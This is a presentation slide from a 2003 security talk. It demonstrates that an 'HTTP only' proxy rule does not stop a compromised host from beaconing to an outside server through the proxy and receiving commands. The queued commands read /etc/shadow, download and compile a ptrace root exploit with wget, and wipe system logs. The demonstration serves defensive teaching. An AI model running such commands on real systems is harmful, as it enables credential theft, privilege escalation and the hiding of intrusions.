All locked down.
  Now that only true HTTP is allowed, we're safe, right?
  $ nc proxy 3128
  POST http://home.my_server.net/cgi-bin/runcommands.cgi HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/4.0 (compatible; ...)
  Host: home.my_server.net
  Connection: Keep-Alive
  Cache-Control: no-cache
  Content-Length: 83
  uname=Linux+testy+2.4.10-bf2.4+\%231+Son+Apr+14+09\%3a53\%3acpu=
  686&cpuspeed=731&memfree=103727
  shadow     now   cat /etc/shadow
  ptracebug  now   cd /tmp; wget ...ptracebug.c; make ptracebug; 
                    ./ptracebug && echo r00ted
  clearlogs  10m   /tmp/.../newsudo cat /dev/null > /var/log/messages

Copyright 2003, Bri Hatch of Onsight, Inc.

Presented at SecureWorld Expo, 2003.

Presentation created using vim and MagicPoint.